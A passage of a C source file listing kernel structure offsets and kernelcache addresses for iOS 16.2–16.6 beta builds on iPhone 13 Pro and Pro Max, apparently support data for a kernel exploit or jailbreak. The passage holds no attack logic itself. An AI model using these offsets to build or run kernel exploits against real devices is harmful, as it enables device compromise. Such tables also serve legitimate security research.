.fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a379190, .kernelcache__gPhysBase = 0xfffffff0078580c8, .kernelcache__gPhysSize = 0xfffffff0078580c8 + 0x8, .kernelcache__gVirtBase = 0xfffffff0078562a8, .kernelcache__perfmon_devices = 0xfffffff00a3b43b0, .kernelcache__perfmon_dev_open = 0xfffffff007ed8fa8, .kernelcache__ptov_table = 0xfffffff00780b370, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3b3800, .kernelcache__vm_pages = 0xfffffff007808098, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00780a330, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3b37f8, .kernelcache__vn_kqfilter = 0xfffffff007f28fd0, }, // iOS 16.3 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8110", .build_version = "20D47", .device_id = "iPhone14,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381190, .kernelcache__gPhysBase = 0xfffffff0078581b0, .kernelcache__gPhysSize = 0xfffffff0078581b0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007856390, .kernelcache__perfmon_devices = 0xfffffff00a3bc3b0, .kernelcache__perfmon_dev_open = 0xfffffff007ed905c, .kernelcache__ptov_table = 0xfffffff00780b3b0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3bb800, .kernelcache__vm_pages = 0xfffffff0078080d8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00780a370, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3bb7f8, .kernelcache__vn_kqfilter = 0xfffffff007f29074, }, // iOS 16.3.1 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8110", .build_version = "20D67", .device_id = "iPhone14,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381190, .kernelcache__gPhysBase = 0xfffffff0078581b0, .kernelcache__gPhysSize = 0xfffffff0078581b0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007856390, .kernelcache__perfmon_devices = 0xfffffff00a3bc3b0, .kernelcache__perfmon_dev_open = 0xfffffff007ed905c, .kernelcache__ptov_table = 0xfffffff00780b3b0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3bb800, .kernelcache__vm_pages = 0xfffffff0078080d8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00780a370, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3bb7f8, .kernelcache__vn_kqfilter = 0xfffffff007f29074, }, // iOS 16.4 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:43:00 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8110", .build_version = "20E247", .device_id = "iPhone14,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a465208, .kernelcache__gPhysBase = 0xfffffff007937fc0, .kernelcache__gPhysSize = 0xfffffff007937fc0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007936198, .kernelcache__perfmon_devices = 0xfffffff00a4a3520, .kernelcache__perfmon_dev_open = 0xfffffff007ef9210, .kernelcache__ptov_table = 0xfffffff0078eb180, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4a2990, .kernelcache__vm_pages = 0xfffffff0078e7ec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ea130, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4a2988, .kernelcache__vn_kqfilter = 0xfffffff007f45ae0, }, // iOS 16.4.1 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:43:00 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8110", .build_version = "20E252", .device_id = "iPhone14,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a465208, .kernelcache__gPhysBase = 0xfffffff007937fc0, .kernelcache__gPhysSize = 0xfffffff007937fc0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007936198, .kernelcache__perfmon_devices = 0xfffffff00a4a3520, .kernelcache__perfmon_dev_open = 0xfffffff007ef9210, .kernelcache__ptov_table = 0xfffffff0078eb180, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4a2990, .kernelcache__vm_pages = 0xfffffff0078e7ec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ea130, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4a2988, .kernelcache__vn_kqfilter = 0xfffffff007f45ae0, }, // iOS 16.5 // { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:09:37 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8110", .build_version = "20F66", .device_id = "iPhone14,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a471208, .kernelcache__gPhysBase = 0xfffffff00793c100, .kernelcache__gPhysSize = 0xfffffff00793c100 + 0x8, .kernelcache__gVirtBase = 0xfffffff00793a2d8, .kernelcache__perfmon_devices = 0xfffffff00a4af520, .kernelcache__perfmon_dev_open = 0xfffffff007efd480, .kernelcache__ptov_table = 0xfffffff0078ef180, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4ae990, .kernelcache__vm_pages = 0xfffffff0078ebec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ee130, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4ae988, .kernelcache__vn_kqfilter = 0xfffffff007f49fe8, }, // iOS 16.6 Beta 1 // { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:16:18 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8110", .build_version = "20G5026e", .device_id = "iPhone14,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a519a30, .kernelcache__gPhysBase = 0xfffffff0079502a8, .kernelcache__gPhysSize = 0xfffffff0079502a8 + 0x8, .kernelcache__gVirtBase = 0xfffffff00794e460, .kernelcache__perfmon_devices = 0xfffffff00a559550, .kernelcache__perfmon_dev_open = 0xfffffff007f1db9c, .kernelcache__ptov_table = 0xfffffff0079039c0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a558910, .kernelcache__vm_pages = 0xfffffff007900110, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007902970, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a558908, .kernelcache__vn_kqfilter = 0xfffffff007f6a0b8, }, // End iPhone 13 Pro // // Start iPhone 13 Pro Max // // iOS 16.2 // { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:56 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8110", .build_version = "20C65", .device_id = "iPhone14,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a379190, .kernelcache__gPhysBase = 0xfffffff0078580c8, .kernelcache__gPhysSize = 0xfffffff0078580c8 + 0x8, .kernelcache__gVirtBase = 0xfffffff0078562a8, .kernelcache__perfmon_devices = 0xfffffff00a3b43b0, .kernelcache__perfmon_dev_open = 0xfffffff007ed8fa8, .kernelcache__ptov_table = 0xfffffff00780b370, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3b3800, .kernelcache__vm_pages = 0xfffffff007808098, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00780a330, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3b37f8, .kernelcache__vn_kqfilter = 0xfffffff007f28fd0, }, // iOS 16.3 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8110", .build_version = "20D47", .device_id = "iPhone14,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 